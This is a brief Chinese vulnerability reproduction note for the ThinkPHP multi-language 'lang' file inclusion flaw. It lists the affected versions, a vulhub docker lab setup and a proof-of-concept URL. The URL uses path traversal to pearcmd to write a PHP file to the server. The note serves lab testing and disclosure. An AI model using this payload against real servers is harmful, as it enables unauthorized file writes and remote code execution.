ThinkPHP LoadLangPack lang 任意文件包含漏洞

漏洞描述

当Thinkphp 程序开启了多语言功能时，可以通过 get、header、cookie 等位置传入参数，使用 pearcmd 文件包含达到命令执行，获取服务器权限

漏洞影响

Thinkphp，v6.0.1~v6.0.13，v5.0.x，v5.1.x

环境搭建

docker pull vulhub/thinkphp:6.0.12

漏洞复现

主页面

验证POC

/public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php